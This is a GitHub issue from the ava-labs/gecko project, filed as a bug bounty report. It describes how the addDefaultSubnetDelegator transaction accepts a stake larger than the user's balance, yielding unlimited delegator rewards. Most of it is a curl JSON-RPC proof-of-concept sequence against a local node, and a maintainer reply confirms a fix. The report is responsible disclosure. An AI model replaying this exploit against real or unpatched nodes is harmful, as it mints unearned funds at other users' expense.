### ISSUE TITLE
Unlimited delegator reward

### ISSUE THREAD

**Issue by bb-2** [ava-labs/gecko#252]
**Describe the bug**
The addDefaultSubnetDelegator tx can be issued with a stakeAmount larger than the user's balance. This stakeamount will be propagated through the reward_validator_tx to the destination account specified in the delegator tx

**To Reproduce**
1. spin up a local staking network
2. create a user and platform account
3. issue an addDefaultSubnetDelegator tx with the user's platform account as the `destination` param and the desired amount as the `stakeAmount` param
4. wait for the validation duration to expire
5. profit!
```
curl -X POST --data '{
    "jsonrpc":"2.0",
    "id"     :1,
    "method" :"keystore.createUser",
    "params" :{
        "username":"alice",
        "password":"let me in!!!"
    }
}' -H 'content-type:application/json;' 127.0.0.1:9658/ext/keystore

curl -X POST --data '{
    "jsonrpc": "2.0",
    "method": "platform.createAccount",
    "params": {
        "username":"alice",
        "password":"let me in!!!"
    },
    "id": 1
}' -H 'content-type:application/json;' 127.0.0.1:9658/ext/P

curl -X POST --data '{
    "jsonrpc": "2.0",
    "method": "platform.addDefaultSubnetDelegator",
    "params": {
        "id":"the node id for a current validator",
        "payerNonce":1,
        "destination":"alice's P-chain address",
        "startTime":'$(gdate --date="10 minutes" +%s)',
        "endTime":'$(gdate --date="2 days" +%s)',
        "stakeAmount":1000000000000000
    },
    "id": 1
}' -H 'content-type:application/json;' 127.0.0.1:9658/ext/P

curl -X POST --data '{
    "jsonrpc": "2.0",
    "method": "platform.sign",
    "params": {
       "tx":"the platform.addDefaultSubnetDelegator tx",
        "signer":"alice's P-chain address",
        "username":"alice",
        "password":"let me in!!!"
    },
    "id": 2
}' -H 'content-type:application/json;' 127.0.0.1:9658/ext/P

curl -X POST --data '{
    "jsonrpc": "2.0",
    "method": "platform.issueTx",
    "params": {
        "tx":"the signed platform.addDefaultSubnetDelegator"
    },
    "id": 3
}' -H 'content-type:application/json;' 127.0.0.1:9658/ext/P
curl -X POST --data '{
    "jsonrpc": "2.0",
    "method": "platform.getAccount",
    "params":{
        "address":"alice's P-chain address"
    },
    "id": 1
}' -H 'content-type:application/json;' 127.0.0.1:9650/ext/bc/P
```

**Expected behavior**
The staking amount should be checked during a semantic_verify call, possibly here, https://github.com/ava-labs/gecko/blob/master/vms/platformvm/add_default_subnet_delegator_tx.go#L131

By submitting this issue I agree to the [Terms and Conditions](https://files.avalabs.org/legal/bug_hunt_q2_2020_terms.pdf) of the [Developer Accelerator Program](https://avalabs.org/dap).

**Comment by aaronbuchwald** [comment]
Thanks for catching this @bb-2 , we've implemented a fix and will roll it out in the next release
